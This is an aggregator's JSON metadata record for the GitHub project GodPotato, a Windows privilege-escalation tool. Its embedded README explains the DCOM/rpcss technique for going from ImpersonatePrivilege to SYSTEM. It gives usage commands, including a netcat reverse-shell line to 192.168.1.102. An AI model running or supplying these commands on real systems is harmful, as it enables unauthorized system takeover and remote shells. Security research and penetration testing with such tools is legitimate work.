{"id":13607430,"url":"https://github.com/BeichenDream/GodPotato","last_synced_at":"2025-04-12T11:32:37.018Z","repository":{"id":152370599,"uuid":"581555871","full_name":"BeichenDream/GodPotato","owner":"BeichenDream","description":null,"archived":false,"fork":false,"pushed_at":"2023-11-24T19:22:31.000Z","size":328,"stargazers_count":1927,"open_issues_count":6,"forks_count":235,"subscribers_count":10,"default_branch":"main","last_synced_at":"2025-04-08T02:39:18.402Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/BeichenDream.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2022-12-23T14:37:00.000Z","updated_at":"2025-04-08T00:57:05.000Z","dependencies_parsed_at":"2023-11-24T18:27:16.395Z","dependency_job_id":"bef0dad3-74de-4df1-bb3d-f575e39464f9","html_url":"https://github.com/BeichenDream/GodPotato","commit_stats":null,"previous_names":[],"tags_count":2,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BeichenDream%2FGodPotato","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BeichenDream%2FGodPotato/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BeichenDream%2FGodPotato/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BeichenDream%2FGodPotato/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/BeichenDream","download_url":"https://codeload.github.com/BeichenDream/GodPotato/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248560261,"owners_count":21124619,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-01T19:01:18.560Z","updated_at":"2025-04-12T11:32:32.010Z","avatar_url":"https://github.com/BeichenDream.png","language":"C#","funding_links":[],"categories":["C# #","Windows","Security"],"sub_categories":["Tools","Security Tools"],"readme":"# GodPotato\n\n\nBased on the history of Potato privilege escalation for 6 years, from the beginning of RottenPotato to the end of JuicyPotatoNG, I discovered a new technology by researching DCOM, which enables privilege escalation in Windows 2012 - Windows 2022, now as long as you have \"ImpersonatePrivilege\" permission. Then you are \"NT AUTHORITY\\SYSTEM\", usually WEB services and database services have \"ImpersonatePrivilege\" permissions.\n\n\n\nPotato privilege escalation is usually used when we obtain WEB/database privileges. We can elevate a service user with low privileges to \"NT AUTHORITY\\SYSTEM\" privileges.\nHowever, the historical Potato has no way to run on the latest Windows system. When I was researching DCOM, I found a new method that can perform privilege escalation. There are some defects in rpcss when dealing with oxid, and rpcss is a service that must be opened by the system. , so it can run on almost any Windows OS, I named it GodPotato\n\n\n\n# Affected version\n\nWindows Server 2012 - Windows Server 2022 Windows8 - Windows 11\n\n\n# Example\n\n```\n\n    FFFFF                   FFF  FFFFFFF\n   FFFFFFF                  FFF  FFFFFFFF\n  FFF  FFFF                 FFF  FFF   FFF             FFF                  FFF\n  FFF   FFF                 FFF  FFF   FFF             FFF                  FFF\n  FFF   FFF                 FFF  FFF   FFF             FFF                  FFF\n FFFF        FFFFFFF   FFFFFFFF  FFF   FFF  FFFFFFF  FFFFFFFFF   FFFFFF  FFFFFFFFF    FFFFFF\n FFFF       FFFF FFFF  FFF FFFF  FFF  FFFF FFFF FFFF   FFF      FFF  FFF    FFF      FFF FFFF\n FFFF FFFFF FFF   FFF FFF   FFF  FFFFFFFF  FFF   FFF   FFF      F    FFF    FFF     FFF   FFF\n FFFF   FFF FFF   FFFFFFF   FFF  FFF      FFFF   FFF   FFF         FFFFF    FFF     FFF   FFFF\n FFFF   FFF FFF   FFFFFFF   FFF  FFF      FFFF   FFF   FFF      FFFFFFFF    FFF     FFF   FFFF\n  FFF   FFF FFF   FFF FFF   FFF  FFF       FFF   FFF   FFF     FFFF  FFF    FFF     FFF   FFFF\n  FFFF FFFF FFFF  FFF FFFF  FFF  FFF       FFF  FFFF   FFF     FFFF  FFF    FFF     FFFF  FFF\n   FFFFFFFF  FFFFFFF   FFFFFFFF  FFF        FFFFFFF     FFFFFF  FFFFFFFF    FFFFFFF  FFFFFFF\n    FFFFFFF   FFFFF     FFFFFFF  FFF         FFFFF       FFFFF   FFFFFFFF     FFFF     FFFF\n\n\nArguments:\n\n        -cmd Required:True CommandLine (default cmd /c whoami)\n\nExample:\n\nGodPotato -cmd \"cmd /c whoami\"\n\n\n```\n\n\nUse the program's built-in Clsid for privilege escalation and execute a simple command\n\n\n```\nGodPotato -cmd \"cmd /c whoami\"\n```\n\n![](images/1.png)\n\n\nCustomize Clsid and execute commands\n\n```\nGodPotato -cmd \"cmd /c whoami\"\n\n```\n\n\n![](images/2.png)\n\n\nExecute reverse shell commands\n\n```\nGodPotato -cmd \"nc -t -e C:\\Windows\\System32\\cmd.exe 192.168.1.102 2012\"\n```\n# Thanks\n\nzcgonvh\n\n\nskay\n\n\n# License\n\n[Apache License 2.0](/LICENSE) \n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FBeichenDream%2FGodPotato","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FBeichenDream%2FGodPotato","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FBeichenDream%2FGodPotato/lists"}